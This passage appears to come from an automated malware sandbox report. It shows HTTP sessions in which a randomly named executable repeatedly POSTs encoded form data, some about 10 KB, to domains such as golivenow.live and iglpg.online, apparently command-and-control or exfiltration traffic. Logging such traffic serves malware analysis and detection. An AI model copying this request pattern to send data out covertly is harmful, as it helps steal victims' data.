                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.aktmarket.xyz
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:30.175510883 CET382INHTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Fri, 06 Dec 2024 08:33:30 GMT
                                                                                                            content-length: 261
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 68 58 78 74 34 56 48 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 62 6c 72 2b 4d 62 78 57 70 74 54 79 71 50 58 7a 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 32 34 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 44 2f 46 32 62 39 6b 55 71 38 62 62 45 58 6b 63 6f 47 76 4f 70 48 52 63 75 73 6e 4a 71 4e 78 6f 36 78 45 3d 26 37 6a 3d 79 66 65 50 31 38 52 68 70 68 4c 68 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.44990966.29.149.46805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:35.718354940 CET679OUTPOST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 50 2b 36 4c 76 6b 33 34 30 74 66 4e 6e 49 70 77 4b 49 6a 48 72 31 37 38 4f 56 35 75 56 53 6f 41 31 51 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStP+6Lvk340tfNnIpwKIjHr178OV5uVSoA1Q==
                                                                                                            Dec 6, 2024 09:33:36.940644979 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:36 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.44991566.29.149.46805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:38.385524035 CET699OUTPOST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 66 50 54 53 77 61 59 52 56 4a 75 57 48 68 74 52 71 39 4a 61 59 56 6d 66 31 61 42 32 57 33 53 2b 63 3d
                                                                                                            Data Ascii: yhXxt4VH=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51fPTSwaYRVJuWHhtRq9JaYVmf1aB2W3S+c=
                                                                                                            Dec 6, 2024 09:33:39.594408989 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:39 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.44992266.29.149.46805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:41.053081989 CET10781OUTPOST /r2k9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.golivenow.live
                                                                                                            Referer: http://www.golivenow.live/r2k9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 56 38 54 6f 4b 4a 55 57 6a 38 5a 33 6e 48 66 6e 75 35 74 58 67 58 4b 42 64 33 2f 78 43 36 63 71 4e 47 67 71 4a 4e 6e 50 34 43 6d 73 6e 62 53 46 6c 45 44 57 69 78 52 77 57 2f 39 72 54 47 38 4b 61 49 68 75 64 46 66 47 44 4f 51 45 5a 4d 73 42 33 50 51 6a 56 2b 45 32 78 6c 52 43 47 43 45 4c 31 42 7a 70 2f 49 52 4b 77 50 56 62 73 58 31 74 67 39 64 78 70 46 4a 31 65 2b 64 73 32 70 2b 2f 71 71 57 78 4e 54 72 36 2f 50 61 7a 33 6a 6b 47 77 73 76 66 6d 74 57 76 4a 4d 38 44 52 38 4e 53 44 61 56 59 4a 6d 39 52 50 77 30 6d 6b 50 66 76 78 71 45 76 36 62 62 69 79 37 72 37 67 64 66 67 [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubV8ToKJUWj8Z3nHfnu5tXgXKBd3/xC6cqNGgqJNnP4CmsnbSFlEDWixRwW/9rTG8KaIhudFfGDOQEZMsB3PQjV+E2xlRCGCEL1Bzp/IRKwPVbsX1tg9dxpFJ1e+ds2p+/qqWxNTr6/Paz3jkGwsvfmtWvJM8DR8NSDaVYJm9RPw0mkPfvxqEv6bbiy7r7gdfglzRzoXMRD/os0OtvfkR4YhCLlkXExmY2xgyE6700RNjedRwI9hemYkUlbm5Ya/nw4rOToV7Rx8HoEx5AKXJd794nHFgohR8fRhPmqbMmSOLYMDzRlvHb99YTwY8MBjPHULVqL3l2rU3+bUzzPqlB4d1L3orIBtk2cWJUGiJm6OS6Lz8qoSwv86Zo+sdmXRLC5kNiMFTgQH8ACA74EbamlBTTE+LeyKsB4Tot4MLyBt5+RtK7DCvEJNuqLhyrFuXgxYS4gf1W4WoLglOpKNxxtVpaSwdFJwvsZuk9QmuKe6mf/RKgkSdTea5JHdFWuO7O+NH6rvzkwmh4xJQtBBUJj4J46XrOTzLtlct22plcrY2q0JVTgs7l0SP3vz16bOfDGu6yJdqdJZTsiuaK2+YhpUD6NG9dW2rDv/kKinanM+ojg9KSfJkjMgGRJYAdlInh/DqbfOlnQqccPvGSE27V3uSsQwiS6Cq+0pWmwrZuSQh630EO+xo7oZVUf3ev6Mumzdp64usznpPz+V/eoNnrc6/oVFW87A65ptaZejrp7AK5bpR89m/j7AOQz1uV9+2N7f2KGQXKQSl/awu/NAN0AA86z7amUbNyDnQHxAWPXAXsVDn6SbqlzQspmiDcSWT8V8eUjW/82KGTWSxj5l8hKFcxdXbPTxTb6i [TRUNCATED]
                                                                                                            Dec 6, 2024 09:33:42.341586113 CET637INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:42 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.44992866.29.149.46805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:43.704458952 CET411OUTGET /r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.golivenow.live
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:33:44.927356005 CET652INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:33:44 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 493
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.4499443.33.130.190805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:50.599488020 CET673OUTPOST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 30 6f 47 70 4c 71 45 4c 39 39 72 46 57 5a 67 6e 76 72 4e 44 51 77 79 72 56 30 69 4c 57 32 4a 79 57 53 63 45 56 71 41 73 77 6d 6c 2f 69 71 53 68 4d 49 79 69 57 73 34 35 63 56 74 45 59 55 73 67 43 49 31 77 52 6d 7a 6c 32 37 55 66 42 47 36 53 66 4e 64 37 51 4b 68 38 4c 67 46 33 6f 71 34 5a 79 54 37 52 44 49 64 6b 7a 65 6c 67 64 58 6d 77 6a 38 6d 4d 57 2b 79 48 47 50 56 68 2b 4f 38 37 44 54 75 67 30 6d 71 72 6f 6c 6e 51 48 74 2f 73 31 77 6e 4b 42 52 65 37 68 52 49 62 79 6d 55 41 35 6d 71 73 5a 55 59 59 51 4b 47 44 78 78 68 4c 4c 36 46 5a 53 51 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKBRe7hRIbymUA5mqsZUYYQKGDxxhLL6FZSQ==
                                                                                                            Dec 6, 2024 09:33:51.680159092 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.4499543.33.130.190805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:53.275473118 CET693OUTPOST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 46 39 79 59 54 73 45 55 72 41 73 33 6d 6c 2f 74 36 53 6f 43 6f 79 39 57 73 45 4c 63 58 35 45 59 55 34 67 43 4a 46 77 52 33 7a 71 31 4c 56 35 4d 6d 36 55 42 39 64 37 51 4b 68 38 4c 67 52 5a 6f 71 41 5a 79 6a 4c 52 42 70 64 6e 2b 2b 6c 6a 4c 48 6d 77 6e 38 6d 49 57 2b 79 78 47 4e 68 59 2b 49 34 37 44 53 65 67 30 33 71 73 6d 6c 6d 56 61 39 2b 47 78 79 58 43 4d 55 76 4c 69 52 51 5a 37 55 35 73 38 67 6e 32 49 6c 35 50 43 4b 69 77 73 32 6f 2f 47 35 34 51 4a 65 49 31 43 46 77 69 66 33 4d 30 6e 6e 74 49 74 49 6c 45 5a 46 77 3d
                                                                                                            Data Ascii: yhXxt4VH=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCKiws2o/G54QJeI1CFwif3M0nntItIlEZFw=
                                                                                                            Dec 6, 2024 09:33:54.352587938 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.4499603.33.130.190805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:55.942903042 CET10775OUTPOST /rbqc/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.iglpg.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.iglpg.online
                                                                                                            Referer: http://www.iglpg.online/rbqc/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
